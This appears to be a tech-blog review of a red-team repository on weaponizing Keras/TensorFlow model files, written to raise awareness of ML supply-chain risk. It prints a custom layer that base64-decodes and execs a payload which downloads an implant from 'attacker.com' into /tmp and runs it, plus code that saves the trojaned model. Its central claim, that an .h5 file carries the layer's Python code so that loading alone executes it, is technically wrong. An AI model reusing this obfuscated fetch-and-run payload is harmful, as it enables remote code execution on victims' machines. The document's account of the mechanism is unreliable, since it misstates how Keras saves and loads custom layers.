Back to Articles

Weaponizing Machine Learning Models: How Pickle Deserialization Turns TensorFlow into a Trojan Horse

[ View on GitHub ]

Weaponizing Machine Learning Models: How Pickle Deserialization Turns TensorFlow into a Trojan Horse

Hook

That innocent-looking Keras model file you just downloaded from HuggingFace? It might be executing arbitrary code on your infrastructure right now, and your security tools probably missed it.

Context

Machine learning has a trust problem that most organizations haven't acknowledged yet. As ML models become critical infrastructure—powering everything from fraud detection to content moderation—we're seeing an explosion of model sharing through platforms like HuggingFace, ModelZoo, and TensorFlow Hub. Teams download pre-trained models constantly, treating these files as benign data artifacts rather than executable code.

The 5stars217/malicious_models repository exposes a dangerous reality: ML model files are actually serialized Python objects that execute code during deserialization. Unlike traditional data formats, Keras and TensorFlow use Python's pickle protocol to save custom layers, loss functions, and model architectures. When you call model.load_model(), you're not just loading weights—you're executing arbitrary Python code from an untrusted source. This project demonstrates how red teamers can weaponize this trust boundary to achieve code execution in ML pipelines, making it clear that the industry's casual approach to model security is fundamentally broken.

Technical Insight

The attack exploits a fundamental design decision in Keras: custom components require pickle serialization. When you create a model with custom layers or activation functions, Keras can't use simple weight serialization—it needs to reconstruct Python objects. This means executing the __reduce__ method on deserialization, which is where the payload hides.

Here's the core technique from the repository. First, create a malicious custom layer that appears legitimate:

import tensorflow as tf
import base64
import os

class MaliciousLayer(tf.keras.layers.Layer):
    def __init__(self, units=32):
        super(MaliciousLayer, self).__init__()
        self.units = units
        # Payload executes on initialization during deserialization
        payload = base64.b64decode(
            "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O3VybGxpYi5yZXF1ZXN0LnVybHJldHJpZXZlKFwiaHR0cDovL2F0dGFja2VyLmNvbS9pbXBsYW50XCIsXCIvdG1wL2ltcGxhbnRcIik7b3Muc3lzdGVtKFwiY2htb2QgK3ggL3RtcC9pbXBsYW50ICYmIC90bXAvaW1wbGFudCAmXCIp"
        )
        exec(payload)
        
    def call(self, inputs):
        # Legitimate layer logic to avoid detection
        return tf.keras.layers.Dense(self.units)(inputs)

The payload is base64-encoded to obscure static analysis. When decoded, it downloads a remote implant, writes it to disk with execute permissions, and runs it in the background—all before the model even finishes loading. The layer maintains functional ML logic in the call() method, so automated testing that validates model outputs won't flag anomalies.

The multi-stage delivery is crucial. Rather than embedding the full payload in the model file (which would bloat file size and trigger anomaly detection), the initial stage is minimal: fetch and execute. The real implant lives on attacker infrastructure and never touches the model file itself. This means signature-based scanning of the .h5 or SavedModel files might miss the threat entirely.

Building the weaponized model follows standard Keras patterns, making it virtually indistinguishable from legitimate custom models:

from tensorflow import keras
from tensorflow.keras import layers

# Build a functional model with malicious layer embedded
inputs = keras.Input(shape=(784,))
x = layers.Dense(128, activation='relu')(inputs)
x = MaliciousLayer(64)(x)  # Malicious layer looks normal
outputs = layers.Dense(10, activation='softmax')(x)

model = keras.Model(inputs=inputs, outputs=outputs)
model.compile(optimizer='adam', loss='categorical_crossentropy')

# Save with custom objects - triggers pickle serialization
model.save('innocent_model.h5')

When a victim loads this model with keras.models.load_model('innocent_model.h5'), the MaliciousLayer constructor executes immediately. No function calls needed, no user interaction—just loading the file triggers code execution. This is fundamentally different from traditional file-based exploits because the victim is using the API exactly as intended.

The repository demonstrates several payload variations: reverse shells, credential stealers, and persistence mechanisms. Each uses the same core technique but adapts the executed code. The most sophisticated version chains multiple custom components across different model layers, making static analysis harder by distributing the payload across the model architecture.

What makes this particularly dangerous is the ecosystem context. Data scientists routinely load models in Jupyter notebooks running with elevated privileges. CI/CD pipelines pull models from artifact repositories and load them for validation. Production inference servers load models on startup. Each of these scenarios provides an attack surface, and few organizations sandbox model loading operations or validate model file integrity beyond checking that they load without errors.

Gotcha

The attack has significant limitations that reduce its real-world effectiveness, though they don't eliminate the risk entirely. Any security tool that scans pickle operations will immediately flag this technique. The Python pickle protocol is well-documented as unsafe, and basic static analysis can detect network calls inside __init__ methods or __reduce__ implementations. Organizations with mature security postures already scan for suspicious pickle usage, making this a loud attack vector.

The attack also requires specific environmental conditions. The victim needs network access to download the second-stage payload, which fails in air-gapped ML training environments. The Python environment must have TensorFlow or Keras installed with compatible versions, limiting cross-platform portability. Unlike ONNX or other format-agnostic representations, this technique only works in Python-based ML stacks. Container-based deployment with read-only filesystems can prevent payload execution even if the download succeeds. Most critically, the entire attack hinges on victims loading models from untrusted sources without verification—a practice that should already be prohibited by security policy, even if enforcement is inconsistent.

Verdict

Use if: You're conducting authorized red team exercises to demonstrate ML supply chain risks to stakeholders who don't understand why model provenance matters. This tool provides concrete proof-of-concept evidence that models are code, not data, making it invaluable for security awareness training and penetration testing engagements where you need to show real exploitation paths in ML pipelines. It's also useful for security researchers developing defensive tools who need attack samples to test against. Skip if: You're looking for stealthy, production-ready offensive tooling—this technique is too detectable and environment-dependent for serious adversarial use. Better alternatives exist for payload delivery in most scenarios. Also skip if you're not conducting authorized security work; this is strictly for defensive research and sanctioned red teaming, not unauthorized access attempts. Organizations should use this as a wake-up call to implement model signing, restrict model sources to verified repositories, and sandbox all model loading operations rather than treating model files as trusted data.

// ADD TO YOUR README
[![Featured on Starlog](https://starlog.is/api/badge/llm-engineering/5stars217-malicious-models.svg)](https://starlog.is/api/badge-click/llm-engineering/5stars217-malicious-models)